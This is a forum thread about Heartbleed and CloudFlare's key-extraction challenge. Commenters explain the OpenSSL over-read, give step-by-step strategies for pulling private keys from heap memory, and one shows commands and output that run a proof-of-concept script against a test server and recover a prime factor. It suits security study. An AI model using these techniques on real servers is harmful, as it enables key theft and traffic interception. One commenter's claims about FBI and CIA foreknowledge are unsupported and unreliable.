That is true - but this exploit doesn't depend on setting a length of 65,536. The server takes whatever length the client gives it (which is, afterall, the bug). Most of the early exploits just happen to set the maximum packet size to get as much data out (not realizing the nuances of heap allocation). You can set a length of 8bytes or 16bytes and get allocated in a very different part of the heap.
The metasploit module for this exploit supports varied lengths. Beating this challenge could have been as simple as running it with short lengths repeatably and re-assembling the different parts of the key as you find it.
edit something that I want to sneak in here since I missed the other threads. Cloudflare keep talking about how they had the bug 12 days early. Security companies and vendors have worked together to fix bugs in private for years, but this is the first time i've ever seen a company brag about it or put a marketing spin on it. It isn't good - one simple reason why: other security companies will now have to compete with that, which forces companies not to co-operate on bugs (we had the bug 16 days early, no we had the bug 18 days early!, etc.).
As users you want vendors and security companies co-operating, not competing at that phase.
 Cloudflare - Can You Get Private SSL Keys Using Heartbleed? http://blog.cloudflare.com/answering-the-critical-question-c...
 see https://github.com/rapid7/metasploit-framework/blob/master/m...
// Essentially OpenSSLs bug is the following
buffer = malloc(payload_claimed) // we aren't going over these bounds
memcpy(buffer, your_actual_payload, payload_claimed) // we are going over your_actual_payloads bounds
By changing your actual payloads size you can influence what data we get. The payload claimed doesn't really matter, that's just the amount we copy starting from wherever our actual payload ends up so that should always be 65536 for best results.
Incidentally i got the following off the server (a payload size of 0x1D seems to hit it) but it doesn't seem to accept it as the real RSA key.
I wonder if someones spamming requests containing false keys to the server or if they've just stopped accepting answers.
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
Just for further reference i recommend reading about OpenSSLs freelists implementation. Essentially if you have an object that uses a specific amount of space it will be stored in a specific location. Which is why private key extraction is possible. You just need to craft a request that puts your_actual_payload in a location so that the 65536 bytes that are read from it into a buffer also end up reading the key.
But brute force everything you get back? Easy.
Take every key-sized chunk of heap you got back, and see if, when interpreted as the key, it is the private key to the public cert. When found, send it in!
edit: OpenSSL wraps malloc, so it is different on different systems. You could find out what the probabilities are by looking at the source. For some reason FreeBSD's malloc gave up private keys with the default exploit length and not much effort. It was only a matter of time before other platforms were also figured out.
Note that the FreeBSD exploit worked on a fresh server after boot, which might have also been the case here.
Note that in the heap there are the intermediate values that and are used when constructing the connection and doing the encryption, you aren't exactly looking for '------BEGIN PRIVATE KEY------' or base64 string, you'd be looking for those - each which have a unique data type.
That's what I thought as well when I saw people POSTing strings like that and other people finding them. But when the key is first loaded from file, wouldn't actually all those base64 strings be in memory?
Probably just pretty unlikely that they would persist for a long time without being overwritten.
You can't, however, get away with not having the private key modulus in memory (in some form) all the time.
"We fixed the flaw on Monday March 31, 2014 for all CloudFlare customers, with public notification on Monday April 7, 2014, after the researchers' public announcement." -- https://support.cloudflare.com/hc/en-us/articles/201660084-U...
And we didn't know what to do about it...
CIA and FBI had knowledge of variations of this vulnerability nearly 10 years ago.
OpenSSL has been patching variations of this bug for that whole time, and every good hacker, (and the bad ones) have been exploiting OpenSSL since its creation.
People act surprised, but OpenSSL has never had a secure release. Ever.
This isn't true. Don't make things up - this bug is bad enough without misinformation.
OpenSSL has been patching variations of this bug for that whole time
Untrue. OpenSSL has been patching unrelated bugs since it was created (as has most software).
This is unrelated to heartbleed.
The known vulnerabilities list for OpenSSL has never had a release that didn't have a flaw that allowed some amount of "backdooring", Dataextraction, or data manipulation. (as opposed to just a path for a DoS attack)
>Don't make things up -
I don't have to make things up. The CIA and FBI keep a list of known vulnerabilities, publicly and not publicly documented. They use this information for doing investigations. I have personally run in to issues where I was contacted by FBI because we had created fixes for our deployments and they contacted us to "unfix" them, because their warrants were "no knock" and they didn't wish to tell us who they were attempting to do surveillance on.
Feel free to Google me (Brandon Wirtz) if you need some background on my credentials in the security space.
But thanks for jumping to I make stuff up. The mis-information that is out there is that OpenSSL has ever been secure.
I'm more sad nobody beyond XKCD did a good job explaining how the bug works, or doing the demonstration I like where you bash on the server and do data alignment to show a couple of gigs worth of data from a single server. People aren't scared enough of this stuff.
All those people saying "change your passwords on every site", but nobody is creating a huge public list of which sites are currently not patched.
so >bad enough without misinformation
No. People are too complacent and the OpenSource community doesn't own up to the things they let slip by. The "smart" guys at CDN's and Banks, were never at risk because they use proxies that have extremely short "memory life" because data is streaming through rather than stored (by the time you could get a second value to do finger printing everything would have changed), and are running NSS, or Matrix or Polar.
Hearbleed is an issue because too many people are too complacent, too trustworthy, and too uninformed.
So in conclusion there are a number of hard but necessary steps to reduce the threat surface from this sort of thing ever happening again. Because doing the same thing and expecting a different result is the literal definition of "stupid."
FOSS is part of the economy and important projects should be treated with the seriousness, responsibility and customer service of a business, even if the sale price is $0.
I think that the revenue model for Polar has put more money in to making sure it is secure. OpenSSL has always suffered from the fact that it is mostly "leach Ware". People use but they don't contribute because it isn't related to their core competency, so they don't mod or upgrade it. Polar on the other hand has people paid to test, patch and maintain the code.
I don't suggest doing the Clear Text between server and proxy, but the idea is the same. You use a proxy so that you don't ever have user names or passwords in memory longer than a few ms.
Once a user is authenticated data passes through quickly making it very very difficult to do a fingerprint match of the data you do extract.
Also because you can load balance across proxies you may not even hit the same machine with a second "hear beat".
The Cert still has to be there somewhere, so you could still end up giving up a cert, and you could give away anything that fits on a single HTML page as it is flying by in the stream... But most sites know better than to display a password, or a username and a bank account number at the same time (not all, but most).
Heart Bleed is more of an issue because too many people built monoliths, rather than compartmentalizing. The Titanic didn't sink because it was compartmentalized, it sank because the man at the Wheel didn't know to let one compartment take all of the force, and instead spread it over a larger surface.
Your proxy should be disposable. Nothing of value should be on the thing that talks to the user, and shouldn't retain data for any length of time.
Heartbleed is dangerous because it exposes private keys, and that let's you decrypt SSL traffic. That in turn may let you read passwords.
Don't conflate the two separate things.
Compartmentizing is good, but doesn't protect against Heartbleed.
Disposable proxies don't protect you.
Perfect Forward Secrecy does protect you because the private keys aren't reused. It is notable that you didn't mention the one technique that actually helps.
To me that shows you misunderstand what heartbleed is. Some if your critisms of OpenSSL are valid, but not for the reasons you claim.
The Private Key Exposure lets you do impersonation, but you would have to do something with DNS, or such to get it to work. Where as me getting your user/pass, or account information has immediate impact, and can't be "undone".
Conflate doesn't mean what you think it does. Conflate has to be wrapper for several topics or ideas that are related.
I can't "conflate" two unrelated things because conflation is by default "true". If we were discussing Gentrification, and Inflation in the housing market of San Francisco then we be talking about the conflated issue of "The San Francisco Housing Crisis".
Just as you can't "inflate" something with a vacuum or sand, or peanut butter, you can't conflate it with something that is unrelated.
This issue of the understanding of the word conflate comes from the fact that people think that "confused" sounds so much like it, and when they are trying to sound smart they use the word conflate when they really mean confuse, and think the two are synonyms.
PlexiNLP (I know my words)
You won't find it on them. Their branch doesn't have the issue.
Also look through this http://web.nvd.nist.gov/view/vuln/search-results?query=opens...
You will see mentions of this bug in products that use OpenSSL quite often.
After the Snowden business, I wouldn't be hugely surprised if the gov't was secretly aware of Heartbleed, but I'm not comfortable taking a random stranger's word for it.
If there is a common denomenator between all OpenSSL bugs in the last 10 years is that they often come from basic problems/difficulties with C (array out of bounds, length checks and such).
OpenSSL has been vulnerable as you state because it is C rather than managed code, and managing memory has never been one of the core teams strong suits.
I get the reason for using C, OpenSSL is probably the most performant SSL solutions available. It is much less resource intensive than say Polar. (NSS is getting there, but is not really a solution for embedded systems [routers and such])
>all OpenSSL bugs in the last 10 years is that they often come from basic problems/difficulties with C (array out of bounds, length checks and such)
When you have a means to over flow or retrieve memory you can get at data or execute code to give you data. Which is the bug that is causing heart bleed.
What is making heart bleed worse is that it goes back so many versions so for the first time in a long time there is a well known vulnerability that is the same on everyone who runs it.
It isn't a "worse" vulnerability it is a "more common one". Think of it like a Genetic defect. If 1 animal in 10 has it, the herd still has "herd immunity". Or the old "there are no viruses for mac" back when mac had like 2% of the market share so even when there were viruses they were hard to spread. We are now at a point everybody who wants to be malicious knows how to attack, and there are a lot of thing to attack, so more attackers will get "lucky" and find something interesting, especially since there will be so many servers that no one remember they need to track down and fix.
How do you not love this guy.
I love the internet.
Just awesome. Only 3 hours to rip out the key!
Me? Insane jealousy.
(Although I do like that he made me google up the X-Men And Teen Titans cover art to confirm the source of his Twitter pic.)
If i replace his IP with some other random IP I get a 400 bad request error, so it's obvious that it works, but curious how that resolves.
Then, your browser checks the received certificate against the authenticated TLS connection, and sees that all is well, allowing you to connect without a warning.
Since the browser does not warn of a certificate mismatch, he must have a valid certificate for 'cloudflarechallenge.com'. QED.
Either go to https://www.cloudflarechallenge.com or remove the www subdomain from your hosts entry.
I see Indutny's blog for 'https://www.cloudflarechallenge.com'[/etc/hosts mapped to 220.127.116.11] in both FF and Chrome.
openssl s_client -connect 18.104.22.168:443 -showcerts \
He's presenting the CloudFlare-obtained cert (which the site offers up on request), so the lack of a warning means he's got that private key.
Getting another CA-signed certificate, naming 'www.cloudflarechallenge.com' and matching another private key, would itself be an impressive compromise, though not the challenge CloudFlare made or what he's demonstrating.
So far, two people have independently solved the Heartbleed Challenge.
The first was submitted at 4:22:01PST by Fedor Indutny (@indutny). He sent at least 2.5 million requests over the span of the challenge, this was approximately 30% of all the requests we saw. The second was submitted at 5:12:19PST by Illkka Mattila using around 100 thousand requests.
We confirmed that both of these individuals have the private key and that it was obtained through Heartbleed exploits. We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we can’t be certain.
Had bleed running in a while loop with no sleep and ab running on a loop as well sending connections to the server hoping to get the mem jostled around enough to cause something like that you described.
I was unsuccessful as of 9:30AM... now I'm really curious to get home and see if I actually caught it... even though I already missed the $10k boat :(
If you only change your current cert to get a new key but you don't go through the revocation process of the old certificate if someone managed to get the old one they can still use it for a MiTM attack - as both certs would be valid to any client.
Specifically, I'd be most interested for such a walkthrough for Google Chrome on OS X, which most people I know use.
Pic of the CloudFlare team reviewing the attack. Ten guys crowded around one monitor.
edit: now why in the world is my comment being downvoted?
Backup Suspect: Teetotaler/Brogrammer-hater. Doesn't like beer on the desk at work.
but imagine this being "the team" in charge of mission critical stuff on a 777.
experience cannot be gained through shortcuts or pure intelligence.
case in point, this very situation.
That looks a lot like the scene from SV where the Snooli guys figure out that the "algorithm" is really good.
Also that's one BIG monitor.
I took the approach of using two fingerprints to search the data:
1) The hex sequence "30 82 .. .. 02 01 00" which would indicate the ASN.1 private key encoding which OpenSSL uses.
2) The modulus which I extracted from the public key (which would also be in the private key structure)
I didn't find any instance of the first, the second I found lots of instances of (because the modulus is also in the public key). I then filtered out all the instances of the public key by searching for the public key header ("30 82 .. .. 30 82").
This actually left me with two unique instances of the modulus in memory which weren't in a public key structure. I then tried to overlay the private key structure over the data and extracted what should have been the prime numbers and ran a primality test on them (to verify; another way would have been to just feed the structure into openssl). Both failed, so it wasn't the private key structure.
But there's a reasonable chance that those two instances represented a cryptographic calculation in progress; so while recovering the key wouldn't be as trivial as if you grabbed the full private key structure from memory (which I suspect is what the successful attackers did) I think it definitely represents another attack angle.
That doesn't make sense to me, seems like the key needs to be in memory all the time, or at least during every session.
1) Create a VM with the same version of Linux, nginx, openssl.
2) Create a self-signed SSL certificate for the server
3) Verify that the HTTPS server is vulnerable to heartbleed
4) Run a few HTTPS requests against the server
5) Use gcore (or just send SIGABRT) to get a core file of the nginx process
6) Write a tool to check the memory image for remnants of the private key (since I know what it looks like). This may be encoded in several forms: as is from the ssl key file, hex encoded modulus, binary encoded modulus, however the BigNum stuff in OpenSSL stores the modulus, intermediate values used in calculations, etc. I can also check for partial matches since I know what the full key looks like.
7) Run the heartbleed client against the site to extract some chunks of memory, there are various strategies for this:-
a) Repeatedly grab the largest (65535) bytes of memory each time
b) Repeatedly grab different sizes (8KB, 16KB, etc) depending on the bucket sizes for OpenSSL's freelist wrapper around malloc.
c) Vary the request size (lots more headers, etc) to try and get different chunks of memory returned.
d) Occasionally restart nginx
8) Once I can reliably (for whatever value of reliably that is) get the key from my own server, I then modify the test for success from a comparison against the known private key, to a test which involves decrypting a string that was the result of encrypting some known plaintext with the known public key. That'll be slower, but still possible.
9) Run that analysis against real data retreived from the challenge server. The data (using the various strategies in #7) can be obtained in the background whilst I'm developing #1-#8. You can't rely on having sole access to the server so whatever strategy you use may be perturbed by other people performing requests.
10) Repeat #1-#8 for Apache and any other web server that is vulnerable to heartbleed.
This does work on the assumption that the key (in whatever form it is in) will be returned as a contiguous block of memory. Trying to patch together chunks of memory to look for the key will be much much harder unless there's significant overlap and it's easy to detect what/where a key is somehow.
As I said, I am not sure that is right or if that was the method used to exploit cloudflare, as I didn't had the time nor the knowledge of openssl implementation to test it out, I am just throwing my guess out there before the official exploit comes about.
EDIT He won't reveal it for a week. Good on him. https://twitter.com/indutny/status/454790640078176256
Anything you'd send to a web server or receive from a web server is presumed compromised.
TL:DR, patch OpenSSL and revoke and rekey all your certs.
Remember, lots of people are pushing up bogus stuff into the heap, so just because you see something there doesn't mean Cloudflare leaked it.
Having to be root to be able to bind to a TCP port <1024 is no longer necessary on a modern OS.
It was fun playing pen tester and getting paid for it this week :)
One of the things that caught me off guard, but isn't surprising is that some hosting companies don't use VM isolation, thus it was possible to pull memory from other sites which may have been patched. Hopefully hosting vendors that don't have isolated VM's don't also allow users to install their own OpenSSL as this would become a vector to compromise neighboring hosts. Of course allowing any custom software install in such an environment is just asking for it.
Could you explain this please?
Here's a possible scenario... I root virtual machine X running on host Z (using heartbleed). Another machine running on Z is virtual machine Y. Because X and Y are not isolated, and I am running whatever I want on X, I can find some uncleared memory (somehow -- how?) that was previously used by Y, thus giving me access to Y. (Seems a bit handwavy, and I'm not sure this is what you meant, so any details would be helpful.)
For some context, I looked up "VM isolation" and found this article which I think sums it up pretty nicely: http://blogs.msdn.com/b/rsa2008/archive/2008/04/07/isolation...
Normally this is protected by tls, but as you can see, for servers that suffer from this hole, it's as good as naught.
Note that this occurs for "any" connections hitting the vulnerable server, meaning that the patient attacker can just run this in a script and scoop up passwords, credit card #'s, form information POST'ed in by all users of the web service all day long until the hole is closed. and even then there's a good chance that the private keys were already exposed, in which case the attacker can now masquerade as the server.
I basically take the stanze that I want as little to do with your real password as possible.
so i booted up a micro vm on amazon aws and was able to dump the private key in one request.
Ubuntu Server 13.10 (PV) - ami-35dbde5c
sudo add-apt-repository ppa:nginx/development
sudo apt-get update
sudo apt-get install nginx
sudo apt-get install ssl-cert
sudo /etc/init.d/nginx restart
curl -O https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py
chmod u+x heartbeat.py
ubuntu@ip-10-185-20-243:~$ ./heartbeat.py localhost /etc/ssl/certs/ssl-cert-snakeoil.pem
Using modulus: C30FB990C6C1EE4EE4524A724BDF10DCDC735C9BCCED84B38796584DCE9F7CB1027CCF63A0E604882AE9B8639CD0955C207BE641943AE38AC4DAE63ECCE7E79ACE7EB9EB5D92F55761924C35A00EB5AE4759CB6DC938DBD48ED34685BC32B3193FEF55F081BB2BFC33494F26E556803FD2506F94301DFD688A63F9F3572C540F3F5E7679D5454E532503636ABFCB95AC5674D47C2B23C4418E04BE1D36AECF6BFEA81FC38FCA3E72A3EACD0BFD4E07FDC3BFA8E70E002ECA68FE8E0621F56081D90A3724A1BED6B5E3BDCDCC02B4EDEAFD0EC4D60C7DEC95BF7756CD82442915EE1AB6738F38B3BA932C8D27B34E94205C84AB64ACC34487ED2FF3804332AB63
Using key size: 128
Scanning localhost on port 443
Sending Client Hello...
Waiting for Server Hello...
Got length: 66
... received message: type = 22, ver = 0302, length = 66
Message Type is 0x02
Got length: 750
... received message: type = 22, ver = 0302, length = 750
Message Type is 0x0B
Got length: 331
... received message: type = 22, ver = 0302, length = 331
Message Type is 0x0C
Got length: 4
... received message: type = 22, ver = 0302, length = 4
Message Type is 0x0E
Server sent server hello done
Server TLS version was 1.2
Sending heartbeat request...
Got length: 16384
... received message: type = 24, ver = 0302, length = 65551
Received heartbeat response:
Got result: 154948185083822336433702373602285084550034029190596792283600073258494868382158852796844241764405565518400264295279959791461705192749666707538790201985451035410116800023040704455951541838840288378897688943017357577574672157589664822948047455855119173651635078033464041188274590174256703712210173285385390714209
found prime: 0xdca74e63a186d60a9de3c8211e21a5b165c6d86d285c1d6eece2ad7a2505890ebae513e3013c3602f148e2112eaa99edd8ff5922494c4db47156727f93ab0f35a298553a82dfbd91e5e8aff2e969f31db31263bce9a89d95b64ff38ff5b86d47fa2e70aac5198d2ea967eb952f48b7264e824bd03b1c955294fb9caeed02ed61L
ubuntu@ip-10-185-20-243:~$ sudo openssl rsa -in /etc/ssl/private/ssl-cert-snakeoil.key -text
Edit: My code's tested too - the primes it gives me are exactly the same as the values in the private key
Edit 2: Doesn't even have to be the first request after restarting, I fired off a few hundred simple test requests first and it still worked. It's likely that any lightly-loaded nginx install on Debian was wide open.
Other possible contributing factors: I was hammering the server with empty https requests hoping it would leave traces of calculation about, and was running a few dozen of the heartbeat keysearch in parallel. I don't know if either of these helped or not.
Who knows, maybe some anonymous benefactor carefully extracted the primes out of a more opaque data structure and uploaded them neatly back to the heap for us all to find!
i also thought an earlier discoverer might have been trolling us :)
d (the private key) is:-
d = e^-1 mod ((p-1)(q-1))
This is why you need to know the factorisation of n=(p*q). You can't compute d (the private key) with just the composite n.
static int RSA_eay_private_decrypt(int flen, const unsigned char *from,
unsigned char *to, RSA *rsa, int padding)
if (ctx != NULL)
if (buf != NULL)
void BN_CTX_free(BN_CTX *ctx)
if (ctx == NULL)
BN_POOL_ITEM *pool = ctx->pool.head;
fprintf(stderr,"BN_CTX_free, stack-size=%d, pool-bignums=%d\n",
unsigned loop = 0;
while(loop < BN_CTX_POOL_SIZE)
fprintf(stderr,"%02x ", pool->vals[loop++].dmax);
pool = pool->next;
static void BN_POOL_finish(BN_POOL *p)
unsigned int loop = 0;
BIGNUM *bn = p->head->vals;
while(loop++ < BN_CTX_POOL_SIZE)
p->current = p->head->next;
p->head = p->current;
void BN_clear_free(BIGNUM *a)
if (a == NULL) return;
if (a->d != NULL)
void OPENSSL_cleanse(void *ptr, size_t len)
unsigned char *p = ptr;
size_t loop = len, ctr = cleanse_ctr;
*(p++) = (unsigned char)ctr;
ctr += (17 + ((size_t)p & 0xF));
p=memchr(ptr, (unsigned char)ctr, len);
ctr += (63 + (size_t)p);
cleanse_ctr = (unsigned char)ctr;
Luckily, the fix is easy, just upgrade, revoke, and force password changes for everyone.